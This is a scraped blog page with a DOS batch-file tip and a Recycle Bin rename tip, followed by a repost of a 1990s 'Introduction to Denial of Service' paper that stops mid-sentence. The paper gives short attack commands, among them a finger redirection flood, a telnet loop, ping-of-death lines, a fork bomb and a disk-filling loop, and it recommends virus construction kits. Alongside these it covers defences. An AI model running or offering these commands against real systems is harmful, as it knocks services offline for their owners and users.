Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file. The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line. It's actually doing what it thinks you've told it: Piping the output of REM to DEL. Since REM has no output, DEL hangs, waiting for the answer to its question.<br />
<br />
===========================================================================<br />
Delimiter character<br />
-------------------<br />
<br />
Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-). Once you did this, you could use either \ or / in PATH specifications.<br />
<br />
DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.<br />
<br />
(Unfortunately, no further details were provided in this file, so not sure if the delimiter character can still be changed somehow.)</dirname></dirname></command></command></dirname></command></command></dirname>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-10743478599421634852010-07-24T22:06:00.001+07:002010-07-24T22:06:38.312+07:00Rename Recycle Bin1. Start, Run, 'Regedit'.<br />
2. Press 'Ctrl'+'F' to open find box and type 'Recycle Bin' to search.<br />
3. Change any value data with 'Recycle Bin' to whatever name you want to give it ( ie, like 'Trash Can' or 'Dump' etc).<br />
4. Press F3 to continue searching for 'Recycle Bin' and change wherever you come across 'Recycle Bin' to new its new name.<br />
5. Repeat step 4 until you have finished with searching and changed all values to its new name.<br />
6. Close regedit and hit F5 on desktop to see the new name on screen.<br />
<br />
Note: As a good practice, always backup your registry before changing anything although changing 'Recycle Bin' name is a simple tweak and doesnt affect anything else.Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-56007924013237628122010-07-24T22:05:00.000+07:002010-07-24T22:05:50.680+07:00Introduction for Denial Of Service=================================== <br />
=INTRODUCTION TO DENIAL OF SERVICE=<br />
===================================<br />
<br />
From :Hans Husman<br />
t95hhu@student.tdb.uu.se<br />
By : cyberRF<br />
<br />
.A. INTRODUCTION<br />
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?<br />
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?<br />
.A.2.1. INTRODUCTION<br />
.A.2.2. SUB-CULTURAL STATUS<br />
.A.2.3. TO GAIN ACCESS<br />
.A.2.4. REVENGE<br />
.A.2.5. POLITICAL REASONS<br />
.A.2.6. ECONOMICAL REASONS<br />
.A.2.7. NASTINESS<br />
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?<br />
<br />
.B. SOME BASIC TARGETS FOR AN ATTACK<br />
.B.1. SWAP SPACE<br />
.B.2. BANDWIDTH<br />
.B.3. KERNEL TABLES<br />
.B.4. RAM<br />
.B.5. DISKS<br />
.B.6. CACHES<br />
.B.7. INETD<br />
<br />
.C. ATTACKING FROM THE OUTSIDE<br />
.C.1. TAKING ADVANTAGE OF FINGER<br />
.C.2. UDP AND SUNOS 4.1.3.<br />
.C.3. FREEZING UP X-WINDOWS<br />
.C.4. MALICIOUS USE OF UDP SERVICES<br />
.C.5. ATTACKING WITH LYNX CLIENTS<br />
.C.6. MALICIOUS USE OF telnet<br />
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4<br />
.C.8. HOW TO DISABLE ACCOUNTS<br />
.C.9. LINUX AND TCP TIME, DAYTIME<br />
.C.10. HOW TO DISABLE SERVICES<br />
.C.11. PARAGON OS BETA R1.4<br />
.C.12. NOVELLS NETWARE FTP<br />
.C.13. ICMP REDIRECT ATTACKS<br />
.C.14. BROADCAST STORMS<br />
.C.15. EMAIL BOMBING AND SPAMMING<br />
.C.16. TIME AND KERBEROS<br />
.C.17. THE DOT DOT BUG<br />
.C.18. SUNOS KERNEL PANIC<br />
.C.19. HOSTILE APPLETS<br />
.C.20. VIRUS<br />
.C.21. ANONYMOUS FTP ABUSE<br />
.C.22. SYN FLOODING<br />
.C.23. PING FLOODING<br />
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES<br />
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE<br />
.C.26. FLEXlm<br />
.C.27. BOOTING WITH TRIVIAL FTP<br />
<br />
.D. ATTACKING FROM THE INSIDE<br />
.D.1. KERNEL PANIC UNDER SOLARIS 2.3<br />
.D.2. CRASHING THE X-SERVER<br />
.D.3. FILLING UP THE HARD DISK<br />
.D.4. MALICIOUS USE OF eval<br />
.D.5. MALICIOUS USE OF fork()<br />
.D.6. CREATING FILES THAT IS HARD TO REMOVE<br />
.D.7. DIRECTORY NAME LOOKUPCACHE<br />
.D.8. CSH ATTACK<br />
.D.9. CREATING FILES IN /tmp<br />
.D.10. USING RESOLV_HOST_CONF<br />
.D.11. SUN 4.X AND BACKGROUND JOBS <br />
.D.12. CRASHING DG/UX WITH ULIMIT <br />
.D.13. NETTUNE AND HP-UX<br />
.D.14. SOLARIS 2.X AND NFS<br />
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION<br />
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X<br />
<br />
.E. DUMPING CORE<br />
.E.1. SHORT COMMENT<br />
.E.2. MALICIOUS USE OF NETSCAPE<br />
.E.3. CORE DUMPED UNDER WUFTPD<br />
.E.4. ld UNDER SOLARIS/X86<br />
<br />
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?<br />
.F.1. BASIC SECURITY PROTECTION<br />
.F.1.1. INTRODUCTION<br />
.F.1.2. PORT SCANNING<br />
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER<br />
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER<br />
.F.1.5. EXTRA SECURITY SYSTEMS<br />
.F.1.6. MONITORING SECURITY<br />
.F.1.7. KEEPING UP TO DATE<br />
.F.1.8. READ SOMETHING BETTER<br />
.F.2. MONITORING PERFORMANCE<br />
.F.2.1. INTRODUCTION<br />
.F.2.2. COMMANDS AND SERVICES <br />
.F.2.3. PROGRAMS<br />
.F.2.4. ACCOUNTING<br />
<br />
.G. SUGGESTED READING<br />
.G.1. INFORMATION FOR DEEPER KNOWLEDGE<br />
.G.2. KEEPING UP TO DATE INFORMATION<br />
.G.3. BASIC INFORMATION<br />
<br />
.H. COPYRIGHT<br />
<br />
.I. DISCLAIMER<br />
<br />
.0. FOREWORD<br />
------------<br />
<br />
In this paper I have tried to answer the following questions:<br />
<br />
- What is a denial of service attack?<br />
- Why would someone crash a system?<br />
- How can someone crash a system.<br />
- How do I protect a system against denial of service attacks?<br />
<br />
I also have a section called SUGGESTED READING were you can find<br />
information about good free information that can give you a deeper<br />
understanding about something.<br />
<br />
Note that I have a very limited experience with Macintosh, OS/2 and<br />
Windows and most of the material are therefore for Unix use. <br />
<br />
You can always find the latest version at the following address:<br />
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT<br />
<br />
Feel free to send comments, tips and so on to address:<br />
t95hhu@student.tdb.uu.se<br />
<br />
.A. INTRODUCTION<br />
~~~~~~~~~~~~~~~~<br />
<br />
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?<br />
-----------------------------------------<br />
<br />
Denial of service is about without permission knocking off<br />
services, for example through crashing the whole system. This<br />
kind of attacks are easy to launch and it is hard to protect<br />
a system against them. The basic problem is that Unix<br />
assumes that users on the system or on other systems will be<br />
well behaved. <br />
<br />
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?<br />
---------------------------------------<br />
<br />
.A.2.1. INTRODUCTION<br />
--------------------<br />
<br />
Why would someone crash a system? I can think of several reasons<br />
that I have presentated more precisely in a section for each reason,<br />
but for short:<br />
<br />
.1. Sub-cultural status.<br />
.2. To gain access.<br />
.3. Revenge.<br />
.4. Political reasons.<br />
.5. Economical reasons.<br />
.6. Nastiness.<br />
<br />
I think that number one and six are the more common today, but that<br />
number four and five will be the more common ones in the future.<br />
<br />
.A.2.2. SUB-CULTURAL STATUS<br />
---------------------------<br />
<br />
After all information about syn flooding a bunch of such attacks<br />
were launched around Sweden. The very most of these attacks were<br />
not a part of a IP-spoof attack, it was "only" a denial of service<br />
attack. Why? <br />
<br />
I think that hackers attack systems as a sub-cultural pseudo career<br />
and I think that many denial of service attacks, and here in the<br />
example syn flooding, were performed for these reasons. I also think<br />
that many hackers begin their carrer with denial of service attacks.<br />
<br />
.A.2.3. TO GAIN ACCESS<br />
----------------------<br />
<br />
Sometimes could a denial of service attack be a part of an attack to<br />
gain access at a system. At the moment I can think of these reasons<br />
and specific holes:<br />
<br />
.1. Some older X-lock versions could be crashed with a <br />
method from the denial of service family leaving the system<br />
open. Physical access was needed to use the work space after.<br />
<br />
.2. Syn flooding could be a part of a IP-spoof attack method.<br />
<br />
.3. Some program systems could have holes under the startup, <br />
that could be used to gain root, for example SSH (secure shell).<br />
<br />
.4. Under an attack it could be usable to crash other machines<br />
in the network or to deny certain persons the ability to access <br />
the system. <br />
<br />
.5. Also could a system being booted sometimes be subverted,<br />
especially rarp-boots. If we know which port the machine listen<br />
to (69 could be a good guess) under the boot we can send false<br />
packets to it and almost totally control the boot.<br />
<br />
.A.2.4. REVENGE<br />
---------------<br />
<br />
A denial of service attack could be a part of a revenge against a user<br />
or an administrator.<br />
<br />
.A.2.5. POLITICAL REASONS<br />
-------------------------<br />
<br />
Sooner or later will new or old organizations understand the potential<br />
of destroying computer systems and find tools to do it.<br />
<br />
For example imaginate the Bank A loaning company B money to build a<br />
factory threating the environment. The organization C therefor crash A:s<br />
computer system, maybe with help from an employee. The attack could cost<br />
A a great deal of money if the timing is right.<br />
<br />
.A.2.6. ECONOMICAL REASONS<br />
--------------------------<br />
<br />
Imaginate the small company A moving into a business totally dominated by<br />
company B. A and B customers make the orders by computers and depends<br />
heavily on that the order is done in a specific time (A and B could be<br />
stock trading companies). If A and B can't perform the order the customers<br />
lose money and change company.<br />
<br />
As a part of a business strategy A pays a computer expert a sum of money to<br />
get him to crash B:s computer systems a number of times. A year later A<br />
is the dominating company.<br />
<br />
.A.2.7. NASTINESS<br />
-----------------<br />
<br />
I know a person that found a workstation where the user had forgotten to<br />
logout. He sat down and wrote a program that made a kill -9 -1 at a<br />
random time at least 30 minutes after the login time and placed a call to<br />
the program from the profile file. That is nastiness.<br />
<br />
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?<br />
---------------------------------------------<br />
<br />
This is a hard question to answer and I don't think that it will<br />
give anything to compare different Unix platforms. You can't say that<br />
one Unix is more secure against denial of service, it is all up to the<br />
administrator.<br />
<br />
A comparison between Windows 95 and NT on one side and Unix on the<br />
other could however be interesting.<br />
<br />
Unix systems are much more complex and have hundreds of built in programs,<br />
services... This always open up many ways to crash the system from<br />
the inside.<br />
<br />
In the normal Windows NT and 95 network were is few ways to crash<br />
the system. Although were is methods that always will work.<br />
<br />
That gives us that no big different between Microsoft and Unix can<br />
be seen regardning the inside attacks. But there is a couple of<br />
points left:<br />
<br />
- Unix have much more tools and programs to discover an<br />
attack and monitoring the users. To watch what another user<br />
is up to under windows is very hard.<br />
<br />
- The average Unix administrator probably also have much more<br />
experience than the average Microsoft administrator.<br />
<br />
The two last points gives that Unix is more secure against inside<br />
denial of service attacks.<br />
<br />
A comparison between Microsoft and Unix regarding outside attacks<br />
are much more difficult. However I would like to say that the average<br />
Microsoft system on the Internet are more secure against outside<br />
attacks, because they normally have much less services.<br />
<br />
.B. SOME BASIC TARGETS FOR AN ATTACK<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
<br />
.B.1. SWAP SPACE<br />
----------------<br />
<br />
Most systems have several hundred Mbytes of swap space to <br />
service client requests. The swap space is typical used<br />
for forked child processes which have a short life time.<br />
The swap space will therefore almost never in a normal<br />
cause be used heavily. A denial of service could be based <br />
on a method that tries to fill up the swap space.<br />
<br />
.B.2. BANDWIDTH<br />
---------------<br />
<br />
If the bandwidth is to high the network will be useless. Most<br />
denial of service attack influence the bandwidth in some way.<br />
<br />
.B.3. KERNEL TABLES<br />
-------------------<br />
<br />
It is trivial to overflow the kernel tables which will cause<br />
serious problems on the system. Systems with write through<br />
caches and small write buffers is especially sensitive.<br />
<br />
Kernel memory allocation is also a target that is sensitive.<br />
The kernel have a kernelmap limit, if the system reach this<br />
limit it can not allocate more kernel memory and must be rebooted.<br />
The kernel memory is not only used for RAM, CPU:s, screens and so<br />
on, it it also used for ordinaries processes. Meaning that any system<br />
can be crashed and with a mean (or in some sense good) algorithm pretty<br />
fast.<br />
<br />
For Solaris 2.X it is measured and reported with the sar command<br />
how much kernel memory the system is using, but for SunOS 4.X there<br />
is no such command. Meaning that under SunOS 4.X you don't even can<br />
get a warning. If you do use Solaris you should write sar -k 1 to<br />
get the information. netstat -k can also be used and shows how much<br />
memory the kernel have allocated in the subpaging.<br />
<br />
.B.4. RAM<br />
---------<br />
<br />
A denial of service attack that allocates a large amount of RAM<br />
can make a great deal of problems. NFS and mail servers are <br />
actually extremely sensitive because they do not need much<br />
RAM and therefore often don't have much RAM. An attack at <br />
a NFS server is trivial. The normal NFS client will do a <br />
great deal of caching, but a NFS client can be anything <br />
including the program you wrote yourself...<br />
<br />
.B.5. DISKS<br />
-----------<br />
<br />
A classic attack is to fill up the hard disk, but an attack at<br />
the disks can be so much more. For example can an overloaded disk<br />
be misused in many ways.<br />
<br />
.B.6. CACHES<br />
-------------<br />
<br />
A denial of service attack involving caches can be based on a method<br />
to block the cache or to avoid the cache.<br />
<br />
These caches are found on Solaris 2.X:<br />
<br />
Directory name lookup cache: Associates the name of a file with a vnode.<br />
<br />
Inode cache: Cache information read from disk in case it is needed<br />
again.<br />
<br />
Rnode cache: Holds information about the NFS filesystem.<br />
<br />
Buffer cache: Cache inode indirect blocks and cylinders to realed disk<br />
I/O.<br />
<br />
.B.7. INETD<br />
-----------<br />
<br />
Well once inetd crashed all other services running through inetd no<br />
longer will work.<br />
<br />
<br />
.C. ATTACKING FROM THE OUTSIDE<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
<br />
<br />
.C.1. TAKING ADVANTAGE OF FINGER<br />
--------------------------------<br />
<br />
Most fingerd installations support redirections to an other host.<br />
<br />
Ex:<br />
<br />
$finger @system.two.com@system.one.com<br />
<br />
finger will in the example go through system.one.com and on to<br />
system.two.com. As far as system.two.com knows it is system.one.com<br />
who is fingering. So this method can be used for hiding, but also<br />
for a very dirty denial of service attack. Lock at this:<br />
<br />
$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack<br />
<br />
All those @ signs will get finger to finger host.we.attack again and<br />
again and again... The effect on host.we.attack is powerful and<br />
the result is high bandwidth, short free memory and a hard disk with<br />
less free space, due to all child processes (compare with .D.5.).<br />
<br />
The solution is to install a fingerd which don't support redirections,<br />
for example GNU finger. You could also turn the finger service off,<br />
but I think that is just a bit to much.<br />
<br />
.C.2. UDP AND SUNOS 4.1.3.<br />
--------------------------<br />
<br />
SunOS 4.1.3. is known to boot if a packet with incorrect information<br />
in the header is sent to it. This is the cause if the ip_options<br />
indicate a wrong size of the packet.<br />
<br />
The solution is to install the proper patch.<br />
<br />
.C.3. FREEZING UP X-WINDOWS<br />
---------------------------<br />
<br />
If a host accepts a telnet session to the X-Windows port (generally<br />
somewhere between 6000 and 6025. In most cases 6000) could that<br />
be used to freeze up the X-Windows system. This can be made with<br />
multiple telnet connections to the port or with a program which<br />
sends multiple XOpenDisplay() to the port.<br />
<br />
The same thing can happen to Motif or Open Windows.<br />
<br />
The solution is to deny connections to the X-Windows port.<br />
<br />
.C.4. MALICIOUS USE OF UDP SERVICES<br />
-----------------------------------<br />
<br />
It is simple to get UDP services (echo, time, daytime, chargen) to <br />
loop, due to trivial IP-spoofing. The effect can be high bandwidth <br />
that causes the network to become useless. In the example the header <br />
claim that the packet came from 127.0.0.1 (loopback) and the target <br />
is the echo port at system.we.attack. As far as system.we.attack knows <br />
is 127.0.0.1 system.we.attack and the loop has been establish. <br />
<br />
Ex:<br />
<br />
from-IP=127.0.0.1<br />
to-IP=system.we.attack<br />
Packet type:UDP<br />
from UDP port 7<br />
to UDP port 7<br />
<br />
Note that the name system.we.attack looks like a DNS-name, but the<br />
target should always be represented by the IP-number.<br />
<br />
Quoted from proberts@clark.net (Paul D. Robertson) comment on<br />
comp.security.firewalls on matter of "Introduction to denial of service"<br />
<br />
" A great deal of systems don't put loopback on the wire, and simply<br />
emulate it. Therefore, this attack will only effect that machine <br />
in some cases. It's much better to use the address of a different <br />
machine on the same network. Again, the default services should <br />
be disabled in inetd.conf. Other than some hacks for mainframe IP <br />
stacks that don't support ICMP, the echo service isn't used by many <br />
legitimate programs, and TCP echo should be used instead of UDP <br />
where it is necessary. "<br />
<br />
.C.5. ATTACKING WITH LYNX CLIENTS<br />
---------------------------------<br />
<br />
A World Wide Web server will fork an httpd process as a respond<br />
to a request from a client, typical Netscape or Mosaic. The process<br />
lasts for less than one second and the load will therefore never<br />
show up if someone uses ps. In most causes it is therefore very<br />
safe to launch a denial of service attack that makes use of <br />
multiple W3 clients, typical lynx clients. But note that the netstat<br />
command could be used to detect the attack (thanks to Paul D. Robertson).<br />
<br />
Some httpd:s (for example http-gw) will have problems besides the normal<br />
high bandwidth, low memory... And the attack can in those causes get<br />
the server to loop (compare with .C.6.)<br />
<br />
.C.6. MALICIOUS USE OF telnet<br />
-----------------------------<br />
<br />
Study this little script:<br />
<br />
Ex:<br />
<br />
while : ; do<br />
telnet system.we.attack &<br />
done<br />
<br />
An attack using this script might eat some bandwidth, but it is<br />
nothing compared to the finger method or most other methods. Well<br />
the point is that some pretty common firewalls and httpd:s thinks<br />
that the attack is a loop and turn them self down, until the<br />
administrator sends kill -HUP. <br />
<br />
This is a simple high risk vulnerability that should be checked<br />
and if present fixed.<br />
<br />
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4<br />
-----------------------------------------------<br />
<br />
If the attacker makes a telnet connections to the Solaris 2.4 host and<br />
quits using:<br />
<br />
Ex:<br />
<br />
Control-}<br />
quit<br />
<br />
then will inetd keep going "forever". Well a couple of hundred...<br />
<br />
The solution is to install the proper patch.<br />
<br />
.C.8. HOW TO DISABLE ACCOUNTS<br />
-----------------------------<br />
<br />
Some systems disable an account after N number of bad logins, or waits<br />
N seconds. You can use this feature to lock out specific users from<br />
the system.<br />
<br />
.C.9. LINUX AND TCP TIME, DAYTIME<br />
----------------------------------<br />
<br />
Inetd under Linux is known to crash if to many SYN packets sends to<br />
daytime (port 13) and/or time (port 37).<br />
<br />
The solution is to install the proper patch.<br />
<br />
.C.10. HOW TO DISABLE SERVICES<br />
------------------------------<br />
<br />
Most Unix systems disable a service after N sessions have been<br />
open in a given time. Well most systems have a reasonable default<br />
(lets say 800 - 1000), but not some SunOS systems that have the<br />
default set to 48...<br />
<br />
The solutions is to set the number to something reasonable.<br />
<br />
.C.11. PARAGON OS BETA R1.4<br />
---------------------------<br />
<br />
If someone redirects an ICMP (Internet Control Message Protocol) packet<br />
to a paragon OS beta R1.4 will the machine freeze up and must be<br />
rebooted. An ICMP redirect tells the system to override routing<br />
tables. Routers use this to tell the host that it is sending<br />
to the wrong router. <br />
<br />
The solution is to install the proper patch.<br />
<br />
.C.12. NOVELLS NETWARE FTP<br />
--------------------------<br />
<br />
Novells Netware FTP server is known to get short of memory if multiple<br />
ftp sessions connects to it.<br />
<br />
.C.13. ICMP REDIRECT ATTACKS<br />
----------------------------<br />
<br />
Gateways uses ICMP redirect to tell the system to override routing<br />
tables, that is telling the system to take a better way. To be able<br />
to misuse ICMP redirection we must know an existing connection<br />
(well we could make one for ourself, but there is not much use for that). <br />
If we have found a connection we can send a route that<br />
loses it connectivity or we could send false messages to the host<br />
if the connection we have found don't use cryptation. <br />
<br />
Ex: (false messages to send)<br />
<br />
DESTINATION UNREACHABLE <br />
TIME TO LIVE EXCEEDED<br />
PARAMETER PROBLEM<br />
PACKET TOO BIG<br />
<br />
The effect of such messages is a reset of the connection.<br />
<br />
The solution could be to turn ICMP redirects off, not much proper use<br />
of the service.<br />
<br />
.C.14. BROADCAST STORMS<br />
-----------------------<br />
<br />
This is a very popular method in networks there all of the hosts are<br />
acting as gateways. <br />
<br />
There are many versions of the attack, but the basic method is to <br />
send a lot of packets to all hosts in the network with a destination <br />
that don't exist. Each host will try to forward each packet so <br />
the packets will bounce around for a long time. And if new packets <br />
keep coming the network will soon be in trouble.<br />
<br />
Services that can be misused as tools in this kind of attack is for<br />
example ping, finger and sendmail. But most services can be misused<br />
in some way or another.<br />
<br />
.C.15. EMAIL BOMBING AND SPAMMING<br />
---------------------------------<br />
<br />
In a email bombing attack the attacker will repeatedly send identical<br />
email messages to an address. The effect on the target is high bandwidth,<br />
a hard disk with less space and so on... Email spamming is about sending<br />
mail to all (or rather many) of the users of a system. The point of<br />
using spamming instead of bombing is that some users will try to<br />
send a replay and if the address is false will the mail bounce back. In<br />
that cause have one mail transformed to three mails. The effect on the<br />
bandwidth is obvious.<br />
<br />
There is no way to prevent email bombing or spamming. However have<br />
a look at CERT:s paper "Email bombing and spamming".<br />
<br />
.C.16. TIME AND KERBEROS<br />
------------------------<br />
<br />
If not the the source and target machine is closely aligned will the<br />
ticket be rejected, that means that if not the protocol that set the <br />
time is protected it will be possible to set a kerberos server of<br />
function.<br />
<br />
.C.17. THE DOT DOT BUG<br />
----------------------<br />
<br />
Windows NT file sharing system is vulnerable to the under Windows 95<br />
famous dot dot bug (dot dot like ..). Meaning that anyone can crash<br />
the system. If someone sends a "DIR ..\" to the workstation will a<br />
STOP messages appear on the screen on the Windows NT computer. Note that<br />
it applies to version 3.50 and 3.51 for both workstation and server<br />
version.<br />
<br />
The solution is to install the proper patch.<br />
<br />
.C.18. SUNOS KERNEL PANIC<br />
-------------------------<br />
<br />
Some SunOS systems (running TIS?) will get a kernel panic if a<br />
getsockopt() is done after that a connection has been reset.<br />
<br />
The solution could be to install Sun patch 100804.<br />
<br />
.C.19. HOSTILE APPLETS<br />
----------------------<br />
<br />
A hostile applet is any applet that attempts to use your system<br />
in an inappropriate manner. The problems in the java language<br />
could be sorted in two main groups:<br />
<br />
1) Problems due to bugs.<br />
2) Problems due to features in the language.<br />
<br />
In group one we have for example the java bytecode verifier bug, which<br />
makes is possible for an applet to execute any command that the user<br />
can execute. Meaning that all the attack methods described in .D.X. <br />
could be executed through an applet. The java bytecode verifier bug<br />
was discovered in late March 1996 and no patch have yet been available<br />
(correct me if I'am wrong!!!).<br />
<br />
Note that two other bugs could be found in group one, but they<br />
are both fixed in Netscape 2.01 and JDK 1.0.1.<br />
<br />
Group two are more interesting and one large problem found is the<br />
fact that java can connect to the ports. Meaning that all the methods<br />
described in .C.X. can be performed by an applet. More information<br />
and examples could be found at address:<br />
<br />
http://www.math.gatech.edu/~mladue/HostileArticle.html<br />
<br />
If you need a high level of security you should use some sort of<br />
firewall for protection against java. As a user you could have<br />
java disable. <br />
<br />
.C.20. VIRUS<br />
------------<br />
<br />
Computer virus is written for the purpose of spreading and<br />
destroying systems. Virus is still the most common and famous<br />
denial of service attack method.<br />
<br />
It is a misunderstanding that virus writing is hard. If you know<br />
assembly language and have source code for a couple of virus it<br />
is easy. Several automatic toolkits for virus construction could<br />
also be found, for example:<br />
<br />
* Genvir.<br />
* VCS (Virus Construction Set).<br />
* VCL (Virus Construction Laboratory).<br />
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).<br />
* IVP (Instant Virus Production Kit).<br />
* G2 (G Squared).<br />
<br />
PS-MPC and VCL is known to be the best and can help the novice programmer<br />
to learn how to write virus.<br />
<br />
An automatic tool called MtE could also be found. MtE will transform<br />
virus to a polymorphic virus. The polymorphic engine of MtE is well<br />
known and should easily be catch by any scanner.<br />
<br />
.C.21. ANONYMOUS FTP ABUSE<br />
--------------------------<br />
<br />
If an anonymous FTP archive have a writable area it could be misused<br />
for a denial of service attack similar with with .D.3. That is we can<br />
fill up the hard disk.<br />
<br />
Also can a host get temporarily unusable by massive numbers of<br />
FTP requests.<br />
<br />
For more information on how to protect an anonymous FTP site could<br />
CERT:s "Anonymous FTP Abuses" be a good start.<br />
<br />
.C.22. SYN FLOODING<br />
-------------------<br />
<br />
Both 2600 and Phrack have posted information about the syn flooding attack.<br />
2600 have also posted exploit code for the attack. <br />
<br />
As we know the syn packet is used in the 3-way handshake. The syn flooding<br />
attack is based on an incomplete handshake. That is the attacker host<br />
will send a flood of syn packet but will not respond with an ACK packet.<br />
The TCP/IP stack will wait a certain amount of time before dropping<br />
the connection, a syn flooding attack will therefore keep the syn_received <br />
connection queue of the target machine filled.<br />
<br />
The syn flooding attack is very hot and it is easy to find more information<br />
about it, for example:<br />
<br />
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html<br />
Article by Christopher Klaus, including a "solution". <br />
<br />
[.2.] http://jya.com/floodd.txt<br />
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane<br />
<br />
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html<br />
IP-spoofing Demystified by daemon9 / route / infinity<br />
for Phrack Magazine<br />
<br />
.C.23. PING FLOODING<br />
--------------------<br />
<br />
I haven't tested how big the impact of a ping flooding attack is, but<br />
it might be quite big.<br />
<br />
Under Unix we could try something like: ping -s host<br />
to send 64 bytes packets. <br />
<br />
If you have Windows 95, click the start button, select RUN, then type<br />
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.<br />
<br />
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES<br />
----------------------------------------------------------<br />
<br />
If someone can ping your machine from a Windows 95 machine he or she might<br />
reboot or freeze your machine. The attacker simply writes:<br />
<br />
ping -l 65510 address.to.the.machine<br />
<br />
And the machine will freeze or reboot.<br />
<br />
Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).<br />
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).<br />
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).<br />
<br />
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE<br />
--------------------------------------------------<br />
<br />
The subnet mask reply message is used under the reboot, but some<br />
hosts are known to accept the message any time without any check.<br />
If so all communication to or from the host us turned off, it's dead.<br />
<br />
The host should not accept the message any time but under the reboot.<br />
<br />
.C.26. FLEXlm<br />
-------------<br />
<br />
Any host running FLEXlm can get the FLEXlm license manager daemon<br />
on any network to shutdown using the FLEXlm lmdown command.<br />
<br />
# lmdown -c /etc/licence.dat<br />
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.<br />
<br />
Shutting down FLEXlm on nodes: xxx<br />
Are you sure? [y/n]: y<br />
Shut down node xxx<br />
#<br />
<br />
.C.27. BOOTING WITH TRIVIAL FTP<br />
-------------------------------<br />
<br />
To boot diskless workstations one often use trivial ftp with rarp or<br />
bootp. If not protected an attacker can use tftp to boot the host.<br />
<br />
<br />
.D. ATTACKING FROM THE INSIDE<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
<br />
.D.1. KERNEL PANIC UNDER SOLARIS 2.3<br />
------------------------------------<br />
<br />
Solaris 2.3 will get a kernel panic if this<br />
is executed:<br />
<br />
EX:<br />
<br />
$ndd /dev/udp udp_status<br />
<br />
The solution is to install the proper patch.<br />
<br />
.D.2. CRASHING THE X-SERVER<br />
---------------------------<br />
<br />
If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0<br />
be removed and the x-server will crash.<br />
<br />
Ex:<br />
<br />
$ rm /tmp/.x11-unix/x0<br />
<br />
.D.3. FILLING UP THE HARD DISK<br />
-----------------------------<br />
<br />
If your hard disk space is not limited by a quota or if you can use<br />
/tmp then it`s possible for you to fill up the file system.<br />
<br />
Ex:<br />
<br />
while : ;<br />
mkdir .xxx<br />
cd .xxx<br />
done<br />
<br />
.D.4. MALICIOUS USE OF eval<br />
---------------------------<br />
<br />
Some older systems will crash if eval '\!\!' is executed in the<br />
C-shell.<br />
<br />
Ex:<br />
<br />
% eval '\!\!'<br />
<br />
.D.5. MALICIOUS USE OF fork() <br />
-----------------------------<br />
<br />
If someone executes this C++ program the result will result in a crash<br />
on most systems.<br />
<br />
Ex:<br />
<br />
#include <sys types.h=""><br />
#include <unistd.h><br />
#include <iostream.h><br />
<br />
main()<br />
{<br />
int x;<br />
while(x=0;x<1000000;x++)<br />
{<br />
system("uptime");<br />
fork();<br />
}<br />
}<br />
<br />
You can use any command you want, but uptime is nice<br />
because it shows the workload.<br />
<br />
To get a bigger and very ugly attack you should however replace uptime<br />
(or fork them both) with sync. This is very bad.<br />
<br />
If you are real mean you could also fork a child process for<br />
every child process and we will get an exponential increase of<br />
workload. <br />
<br />
There is no good way to stop this attack and<br />
similar attacks. A solution could be to place a limit<br />
on time of execution and size of processes.<br />
<br />
.D.6. CREATING FILES THAT IS HARD TO REMOVE<br />
-------------------------------------------<br />
<br />
Well all files can be removed, but here is some ideas:<br />
<br />
Ex.I.<br />
<br />
$ cat > -xxx<br />
^C<br />
$ ls<br />
-xxx<br />
$ rm -xxx<br />
rm: illegal option -- x<br />
rm: illegal option -- x<br />
rm: illegal option -- x<br />
usage: rm [-fiRr] file ...<br />
$<br />
<br />
Ex.II.<br />
<br />
$ touch xxx!<br />
$ rm xxx!<br />
rm: remove xxx! (yes/no)? y<br />
$ touch xxxxxxxxx!<br />
$ rm xxxxxxxxx!<br />
bash: !": event not found<br />
$<br />
<br />
(You see the size do count!)<br />
<br />
Other well know methods is files with odd characters or spaces<br />
in the name. <br />
<br />
These methods could be used in combination with ".D.3 FILLING UP THE<br />
HARDDISK". If you do want to remove these files you must use some sort<br />
of script or a graphical interface like OpenWindow:s File<br />
Manager. You can also try to use: rm ./<filename>. It should work for<br />
